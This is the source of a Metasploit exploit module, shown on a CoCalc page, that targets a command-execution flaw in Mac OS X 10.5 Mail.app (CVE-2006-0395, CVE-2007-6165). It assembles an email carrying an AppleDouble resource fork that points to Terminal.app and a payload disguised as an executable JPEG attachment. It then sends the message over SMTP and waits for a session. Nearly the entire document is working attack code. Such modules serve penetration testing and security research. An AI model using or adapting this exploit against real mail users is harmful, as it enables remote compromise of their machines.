Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/email/mailapp_image_exec.rb
19847 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  #

10
  # This module sends email messages via smtp

11
  #

12
  include Msf::Exploit::Remote::SMTPDeliver

13
  include Msf::Exploit::EXE

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Mail.app Image Attachment Command Execution',

20
        'Description' => %q{

21
          This module exploits a command execution vulnerability in the

22
          Mail.app application shipped with Mac OS X 10.5.0. This flaw was

23
          patched in 10.4 in March of 2007, but reintroduced into the final

24
          release of 10.5.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => ['hdm', 'kf'],

28
        'References' => [

29
          ['CVE', '2006-0395'],

30
          ['CVE', '2007-6165'],

31
          ['OSVDB', '40875'],

32
          ['BID', '26510'],

33
          ['BID', '16907']

34
        ],

35
        'Stance' => Msf::Exploit::Stance::Passive,

36
        'Payload' => {

37
          'Space' => 8192,

38
          'DisableNops' => true,

39
          'BadChars' => "",

40
          'Compat' =>

41
              {

42
                'ConnectionType' => '-bind -find',

43
              },

44
        },

45
        'Platform' => %w{unix osx},

46
        'Targets' => [

47
          [

48
            'Mail.app - Command Payloads',

49
            {

50
              'Platform' => 'unix',

51
              'Arch' => ARCH_CMD,

52
              'PayloadCompat' => {

53
                'RequiredCmd' => 'generic perl ruby bash-tcp telnet',

54
              }

55
            }

56
          ],

57
          [

58
            'Mail.app - Binary Payloads (x86)',

59
            {

60
              'Platform' => 'osx',

61
              'Arch' => ARCH_X86,

62
            }

63
          ],

64
          [

65
            'Mail.app - Binary Payloads (ppc)',

66
            {

67
              'Platform' => 'osx',

68
              'Arch' => ARCH_PPC,

69
            }

70
          ],

71
        ],

72
        'DisclosureDate' => '2006-03-01',

73
        'Notes' => {

74
          'Reliability' => UNKNOWN_RELIABILITY,

75
          'Stability' => UNKNOWN_STABILITY,

76
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

77
        }

78
      )

79
    )

80
  end

81


82
  def autofilter

83
    false

84
  end

85


86
  def exploit

87
    exts = ['jpg']

88


89
    gext = exts[rand(exts.length)]

90
    name = rand_text_alpha(5) + ".#{gext}"

91
    data = rand_text_alpha(rand(32) + 1)

92


93
    msg = Rex::MIME::Message.new

94
    msg.mime_defaults

95
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32) + 1)

96
    msg.to = datastore['MAILTO']

97
    msg.from = datastore['MAILFROM']

98


99
    dbl = Rex::MIME::Message.new

100
    dbl.header.set("Content-Type", "multipart/appledouble;\r\n    boundary=#{dbl.bound}")

101
    dbl.header.set("Content-Disposition", "inline")

102


103
    # AppleDouble file version 2

104
    # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'

105
    # Real Name matches msf random generated 5 character name - (I cheated ala gsub)

106


107
    resfork =

108
      "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +

109
      "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +

110
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

111
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

112
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

113
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +

114
      "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +

115
      "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +

116
      "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +

117
      "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +

118
      "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +

119
      "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +

120
      "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +

121
      "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +

122
      "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +

123
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

124
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

125
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

126
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

127
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

128
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

129
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

130
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

131
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

132
      "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"

133


134
    fork = Rex::Text.encode_base64(Rex::Text.decode_base64(resfork).gsub("Heise.jpg", name), "\r\n")

135


136
    cid = "<#{rand_text_alpha(rand(16) + 16)}@#{rand_text_alpha(rand(16) + 1)}.com>"

137


138
    cmd = ''

139


140
    if (target.arch.include?(ARCH_CMD))

141
      cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")

142
    else

143
      bin = generate_payload_exe

144
      cmd = Rex::Text.encode_base64(bin, "\r\n")

145
    end

146


147
    dbl.add_part(fork, "application/applefile;\r\n    name=\"#{name}\"", "base64", "inline;\r\n    filename=#{name}")

148
    dbl.add_part(cmd, "image/jpeg;\r\n    x-mac-type=0;\r\n    x-unix-mode=0755;\r\n    x-mac-creator=0;\r\n    name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n    filename=#{name}")

149


150
    msg.parts << dbl

151


152
    send_message(msg.to_s)

153


154
    print_status("Waiting for a payload session (backgrounding)...")

155
  end

156
end

157


158